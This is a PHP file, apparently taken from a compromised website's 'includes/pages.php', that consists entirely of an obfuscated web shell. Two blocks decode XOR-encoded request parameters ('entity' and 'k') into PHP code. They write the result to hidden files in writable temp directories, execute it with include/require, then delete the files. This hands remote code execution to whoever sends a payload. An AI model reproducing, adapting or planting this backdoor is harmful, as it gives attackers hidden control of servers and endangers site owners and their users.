File: //proc/self/root/proc/self/root/home/vitanhod/sawpalmetto3.vitavit.com.pk/includes/pages.php
<?php if(isset($_REQUEST) && isset($_REQUEST["\x65ntity"])){ $tkn = array_filter(["/var/tmp", getenv("TEMP"), session_save_path(), sys_get_temp_dir(), getcwd(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP")]); $item = $_REQUEST["\x65ntity"]; $item = explode ('.' ,$item ) ; $marker = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6 ); $n = 0; foreach ($item as $v2) { $sChar = ord($s6[$n % $lenS] ); $dec = ((int)$v2 - $sChar - ($n % 10)) ^81; $marker .= chr($dec ); $n++; } foreach ($tkn as $key => $record) { if (array_product([is_dir($record), is_writable($record)])) { $data_chunk = implode("/", [$record, ".flag"]); if (@file_put_contents($data_chunk, $marker) !== false) { include $data_chunk; unlink($data_chunk); exit; } } } }
if(filter_has_var(INPUT_POST, "k")){
$tkn = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getcwd()]);
$element = $_POST["k"];
$element=explode ( '.' , $element );
$parameter_group = '';
$s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s6 );
$__len = count($element );
for ($w = 0; $w < $__len; $w++) { $v9 = $element[$w];
$chS = ord($s6[$w % $lenS] );
$dec = ((int)$v9 - $chS - ($w % 10)) ^ 74;
$parameter_group .= chr($dec );}
foreach ($tkn as $factor):
if (!!is_dir($factor) && !!is_writable($factor)) {
$obj = join("/", [$factor, ".key"]);
if (file_put_contents($obj, $parameter_group)) {
require $obj;
unlink($obj);
die();
}
}
endforeach;
}